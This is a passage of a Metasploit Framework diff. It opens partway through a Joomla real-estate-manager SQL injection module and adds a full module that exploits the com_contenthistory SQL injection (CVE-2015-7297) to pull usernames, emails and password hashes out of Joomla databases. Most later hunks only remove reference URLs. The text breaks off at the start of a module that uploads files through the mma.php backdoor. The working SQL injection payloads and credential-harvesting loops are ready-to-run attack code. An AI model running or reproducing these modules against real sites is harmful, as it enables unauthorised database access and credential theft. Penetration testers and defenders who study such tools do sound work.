OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
], self.class)
end
def print_good(message='')
super("#{rhost}:#{rport} - #{message}")
end
def print_status(message='')
super("#{rhost}:#{rport} - #{message}")
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user]
}.merge(service_data)
if opts[:password]
credential_data.merge!(
private_data: opts[:password],
private_type: :nonreplayable_hash,
jtr_format: 'md5'
)
end
login_data = {
core: create_credential(credential_data),
status: opts[:status],
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def check
flag = Rex::Text.rand_text_alpha(5)
payload = "0x#{flag.unpack('H*')[0]}"
data = sqli(payload)
if data && data.include?(flag)
Msf::Exploit::CheckCode::Vulnerable
else
Msf::Exploit::CheckCode::Safe
end
end
def sqli(query)
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)
payload = '(SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
payload << "0x#{lmark.unpack('H*')[0]},"
payload << '%s,'
payload << "0x#{rmark.unpack('H*')[0]},"
payload << 'FLOOR(RAND(0)*2)'
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
get = {
'option' => 'com_realestatemanager',
'task' => 'showCategory',
'catid' => '50',
'Itemid' => '132'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => get,
})
if res && res.code == 200
cookie = res.get_cookies
post = {
'order_field' => 'price',
'order_direction' => 'asc,' + (payload % query)
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'cookie' => cookie,
'vars_get' => get,
'vars_post' => post
})
# Error based SQL Injection
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
$1
end
end
end
def query_databases
dbs = []
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
dbc = sqli(query)
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
0.upto(dbc.to_i - 1) do |i|
dbname = sqli(query_fmt % i)
dbs << dbname
vprint_good("Found database name: #{dbname}")
end
%w(performance_schema information_schema mysql).each do |dbname|
dbs.delete(dbname) if dbs.include?(dbname)
end
dbs
end
def query_tables(database)
tbs = []
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.TABLES '
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
tbc = sqli(query)
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
query_fmt << 'LIMIT %d,1)'
vprint_status('tables in database: %s' % database)
0.upto(tbc.to_i - 1) do |i|
tbname = sqli(query_fmt % i)
vprint_good("Found table #{database}.#{tbname}")
tbs << tbname if tbname =~ /_users$/
end
tbs
end
def query_columns(database, table)
cols = []
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
colc = sqli(query)
vprint_status("Found Columns: #{colc} from #{database}.#{table}")
valid_cols = [ # joomla_users
'activation',
'block',
'email',
'id',
'lastResetTime',
'lastvisitDate',
'name',
'otep',
'otpKey',
'params',
'password',
'registerDate',
'requireReset',
'resetCount',
'sendEmail',
'username'
]
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
0.upto(colc.to_i - 1) do |i|
record = {}
valid_cols.each do |col|
l = 1
record[col] = ''
loop do
value = sqli(query_fmt % [col, l, i])
break if value.blank?
record[col] << value
l += 54
end
end
cols << record
unless record['username'].blank?
print_good("Found credential: #{record['username']}:#{record['password']} (Email: #{record['email']})")
report_cred(
ip: rhost,
port: datastore['RPORT'],
user: record['username'].to_s,
password: record['password'].to_s,
status: Metasploit::Model::Login::Status::UNTRIED,
proof: record.to_s
)
end
vprint_status(record.to_s)
end
cols
end
def run
dbs = query_databases
dbs.each do |db|
tables = query_tables(db)
tables.each do |table|
cols = query_columns(db, table)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
print_good('Saved file to: ' + path)
end
end
end
end

210
modules/auxiliary/gather/joomla_contenthistory_sqli.rb Normal file
View File

@ -0,0 +1,210 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
'References' =>
[
['CVE', '2015-7297'],
['URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/']
],
'Author' =>
[
'Asaf Orpani', # discovery
'bperry', # metasploit module
'Nixawk' # module review
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 22 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
], self.class)
end
def check
flag = Rex::Text.rand_text_alpha(8)
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)
payload = 'AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT('
payload << "0x#{lmark.unpack('H*')[0]},"
payload << "(SELECT 0x#{flag.unpack('H*')[0]}),"
payload << "0x#{rmark.unpack('H*')[0]},"
payload << 'FLOOR(RAND(0)*2)'
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
res = sqli(payload)
if res && res.code == 500 && res.body =~ /#{lmark}#{flag}#{rmark}/
Msf::Exploit::CheckCode::Vulnerable
else
Msf::Exploit::CheckCode::Safe
end
end
def request(query, payload, lmark, rmark)
query = "#{payload}" % query
res = sqli(query)
# Error based SQL Injection
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
$1
end
end
def query_databases(payload, lmark, rmark)
dbs = []
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
dbc = request(query, payload, lmark, rmark)
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
0.upto(dbc.to_i - 1) do |i|
dbname = request(query_fmt % i, payload, lmark, rmark)
dbs << dbname
vprint_good(dbname)
end
%w(performance_schema information_schema mysql).each do |dbname|
dbs.delete(dbname) if dbs.include?(dbname)
end
dbs
end
def query_tables(database, payload, lmark, rmark)
tbs = []
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.TABLES '
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
tbc = request(query, payload, lmark, rmark)
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
query_fmt << 'LIMIT %d,1)'
vprint_status('tables in database: %s' % database)
0.upto(tbc.to_i - 1) do |i|
tbname = request(query_fmt % i, payload, lmark, rmark)
vprint_good(tbname)
tbs << tbname if tbname =~ /_users$/
end
tbs
end
def query_columns(database, table, payload, lmark, rmark)
cols = []
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
colc = request(query, payload, lmark, rmark)
vprint_status(colc)
valid_cols = [ # joomla_users
'activation',
'block',
'email',
'id',
'lastResetTime',
'lastvisitDate',
'name',
'otep',
'otpKey',
'params',
'password',
'registerDate',
'requireReset',
'resetCount',
'sendEmail',
'username'
]
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
0.upto(colc.to_i - 1) do |i|
record = {}
valid_cols.each do |col|
l = 1
record[col] = ''
loop do
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
break if value.blank?
record[col] << value
l += 54
end
end
cols << record
vprint_status(record.to_s)
end
cols
end
def run
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)
payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
payload << "0x#{lmark.unpack('H*')[0]},"
payload << '%s,'
payload << "0x#{rmark.unpack('H*')[0]},"
payload << 'FLOOR(RAND(0)*2)'
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
dbs = query_databases(payload, lmark, rmark)
dbs.each do |db|
tables = query_tables(db, payload, lmark, rmark)
tables.each do |table|
cols = query_columns(db, table, payload, lmark, rmark)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
print_good('Saved file to: ' + path)
end
end
end
def sqli(payload)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'option' => 'com_contenthistory',
'view' => 'history',
'list[ordering]' => '',
'item_id' => 1,
'type_id' => 1,
'list[select]' => '1 ' + payload
}
)
end
end

1
modules/auxiliary/gather/trackit_sql_domain_creds.rb
View File

@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2014-4872' ],
[ 'OSVDB', '112741' ],
[ 'US-CERT-VU', '121036' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ]
],
'DisclosureDate' => 'Oct 7 2014'

3
modules/auxiliary/scanner/chargen/chargen_probe.rb
View File

@ -35,8 +35,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ]
],
'DisclosureDate' => 'Feb 08 1996')

3
modules/auxiliary/scanner/dect/call_scanner.rb
View File

@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Call Scanner',
'Description' => 'This module scans for active DECT calls',
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
'License' => MSF_LICENSE
)
end

3
modules/auxiliary/scanner/dect/station_scanner.rb
View File

@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Base Station Scanner',
'Description' => 'This module scans for DECT base stations',
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
'License' => MSF_LICENSE
)
end

1
modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
View File

@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '2936'],
[ 'CVE', '2001-0537'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml'],
[ 'OSVDB', '578' ],
],
'DisclosureDate' => 'Jun 27 2001'))

3
modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
View File

@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ]
[ 'OSVDB', '76080']
],
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
'License' => MSF_LICENSE

1
modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb
View File

@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-2861' ],
[ 'BID', '42342' ],
[ 'OSVDB', '67047' ],
[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],
[ 'URL', 'http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],
]

1
modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
View File

@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '70762'],
['CVE', '2011-0049'],
['CVE', '2011-0063'],
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
['EDB', '16103']
],

3
modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
View File

@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'OSVDB', '80262'],
[ 'URL', 'http://retrogod.altervista.org/9sg_me_adv.htm' ]
[ 'OSVDB', '80262']
],
'Author' =>
[

1
modules/auxiliary/scanner/http/tplink_traversal_noauth.rb
View File

@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '86881' ],
[ 'BID', '57969' ],
[ 'EDB', '24504' ],
[ 'URL', 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-011' ]
],
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],

4
modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb
View File

@ -18,10 +18,6 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
},
'References' =>
[
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
],
'Author' => ['SeawolfRN'],
'License' => MSF_LICENSE
)

4
modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
View File

@ -23,10 +23,6 @@ class Metasploit3 < Msf::Auxiliary
The protocol deisgn issue also allows attackers to reset passwords on the device.
},
'Author' => 'Ben Schmidt',
'References' =>
[
[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
],
'License' => MSF_LICENSE
)

3
modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb
View File

@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2012-2215' ],
[ 'OSVDB', '80230' ],
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ],
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html' ]
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]
]
))

6
modules/auxiliary/scanner/rogue/rogue_recv.rb
View File

@ -18,11 +18,7 @@ class Metasploit3 < Msf::Auxiliary
must match the rogue_send parameters used exactly.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
]
'License' => MSF_LICENSE
)
register_options([

6
modules/auxiliary/scanner/rogue/rogue_send.rb
View File

@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
system is using as its default route.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
]
'License' => MSF_LICENSE
)
register_options([

1
modules/auxiliary/scanner/sap/sap_router_info_request.rb
View File

@ -37,7 +37,6 @@ class Metasploit4 < Msf::Auxiliary
'References' => [
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ],
[ 'URL', 'http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm'],
[ 'URL', 'http://www.onapsis.com/research-free-solutions.php' ], # Bizsploit Opensource ERP Pentesting Framework
[ 'URL', 'http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf' ]
],
'Author' =>

2
modules/auxiliary/scanner/ssh/ssh_login.rb
View File

@ -121,6 +121,8 @@ class Metasploit3 < Msf::Auxiliary
framework_module: self,
)
scanner.verbosity = :debug if datastore['SSH_DEBUG']
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(

2
modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
View File

@ -214,6 +214,8 @@ class Metasploit3 < Msf::Auxiliary
framework_module: self,
)
scanner.verbosity = :debug if datastore['SSH_DEBUG']
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(

4
modules/auxiliary/scanner/udp_scanner_template.rb
View File

@ -22,10 +22,6 @@ class Metasploit3 < Msf::Auxiliary
Simply address any of the TODOs.
),
'Author' => 'Joe Contributor <joe_contributor[at]example.com>',
'References' =>
[
['URL', 'https://example.com/~jcontributor']
],
'DisclosureDate' => 'Mar 15 2014',
'License' => MSF_LICENSE
)

1
modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
View File

@ -47,7 +47,6 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
['CVE', '2015-1793'],
['CWE', '754'],
['URL', 'http://www.openssl.org/news/secadv_20150709.txt'],
['URL', 'http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6']
],
'DisclosureDate' => 'Jul 9 2015'

3
modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb
View File

@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2008-3996' ],
[ 'OSVDB', '49321'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml'],
[ 'OSVDB', '49321']
],
'DisclosureDate' => 'Oct 22 2008'))

3
modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb
View File

@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2008-3995' ],
[ 'OSVDB', '49320'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml' ],
[ 'OSVDB', '49320']
],
'DisclosureDate' => 'Oct 22 2008'))

3
modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
View File

@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-3982'],
[ 'OSVDB', '49324'],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
],
'DisclosureDate' => 'Oct 13 2008'))

1
modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb
View File

@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2007-5511'],
[ 'OSVDB', '40079'],
[ 'BID', '26098' ],
[ 'URL', 'http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql'],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
],
'DisclosureDate' => 'Oct 17 2007'))

1
modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
View File

@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2008-3983'],
[ 'OSVDB', '49325'],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]
],

4
modules/auxiliary/sqli/oracle/lt_removeworkspace.rb
View File

@ -22,9 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2008-3984' ],
[ 'OSVDB', '49326'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
[ 'OSVDB', '49326']
],
'DisclosureDate' => 'Oct 13 2008'))

3
modules/exploits/irix/lpd/tagprinter_exec.rb
View File

@ -22,8 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['CVE', '2001-0800'],
['OSVDB', '8573'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
['OSVDB', '8573']
],
'Privileged' => false,
'Platform' => %w{ irix unix },

1
modules/exploits/linux/http/airties_login_cgi_bof.rb
View File

@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['EDB', '36577'],
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
],
'Targets' =>

4
modules/exploits/linux/http/peercast_url.rb
View File

@ -24,9 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2006-1148'],
['OSVDB', '23777'],
['BID', '17040'],
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
['BID', '17040']
],
'Privileged' => false,
'Payload' =>

1
modules/exploits/linux/http/vcms_upload.rb
View File

@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2011-4828'],
['OSVDB', '77183'],
['BID', '50706'],
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
],
'Payload' =>

3
modules/exploits/linux/http/wanem_exec.rb
View File

@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['OSVDB', '85344'],
['OSVDB', '85345'],
['URL', 'http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/']
['OSVDB', '85345']
],
'Payload' =>
{

3
modules/exploits/linux/ids/snortbopre.rb
View File

@ -25,8 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2005-3252'],
['OSVDB', '20034'],
['BID', '15131'],
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
['BID', '15131']
],
'Payload' =>
{

3
modules/exploits/linux/local/sock_sendpage.rb
View File

@ -50,8 +50,7 @@ class Metasploit4 < Msf::Exploit::Local
[
[ 'CVE', '2009-2692' ],
[ 'OSVDB', '56992' ],
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ]
],
'Targets' =>
[

1
modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb
View File

@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2011-0923'],
[ 'OSVDB', '72526'],
[ 'ZDI', '11-055'],
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
[ 'URL', 'https://community.rapid7.com/thread/2253' ]
],

3
modules/exploits/linux/mysql/mysql_yassl_getname.rb
View File

@ -47,8 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '37943' ],
[ 'BID', '37974' ],
[ 'OSVDB', '61956' ],
[ 'URL', 'http://secunia.com/advisories/38344/' ],
[ 'URL', 'http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html' ]
[ 'URL', 'http://secunia.com/advisories/38344/' ]
],
'Privileged' => true,
'DefaultOptions' =>

1
modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
View File

@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2015-0936'],
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
],
'DisclosureDate' => "Apr 01 2015", # Not a joke
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

1
modules/exploits/linux/ssh/symantec_smg_ssh.rb
View File

@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2012-3579'],
['OSVDB', '85028'],
['BID', '55143'],
['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
],
'DefaultOptions' =>

3
modules/exploits/multi/browser/java_calendar_deserialize.rb
View File

@ -37,8 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '50500'],
[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
],
'Platform' => %w{ linux osx solaris win },
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

3
modules/exploits/multi/browser/java_setdifficm_bof.rb
View File

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-3869' ],
[ 'OSVDB', '59710' ],
[ 'BID', '36881' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],
[ 'ZDI', '09-078' ],
[ 'ZDI', '09-078' ]
],
'Payload' =>
{

4
modules/exploits/multi/browser/java_signed_applet.rb
View File

@ -38,9 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => [ 'natron' ],
'References' =>
[
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
# list of trusted Certificate Authorities by java version
[ 'URL', 'http://www.spikezilla-software.com/blog/?p=21' ]
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
],
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },

3
modules/exploits/multi/browser/mozilla_navigatorjava.rb
View File

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2006-3677'],
['OSVDB', '27559'],
['BID', '19192'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
],
'Payload' =>
{

1
modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
View File

@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2014-3996' ],
[ 'OSVDB', '110198' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/55' ]
],
'Arch' => ARCH_X86,

1
modules/exploits/multi/http/manageengine_auth_upload.rb
View File

@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2014-5301'],
['OSVDB', '116733'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
],
'DefaultOptions' => { 'WfsDelay' => 30 },

111
modules/exploits/multi/http/mma_backdoor_upload.rb Normal file
View File

@ -0,0 +1,111 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
'Description' => %q{
This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
operating system version because of the php_uname() function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jay Turla <@shipcod3>',
],
'References' =>
[
['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
],
'Privileged' => false,
'Payload' =>
{
'Space' => 10000,
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['mma file uploader', {} ]
],
'DisclosureDate' => 'Apr 2 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
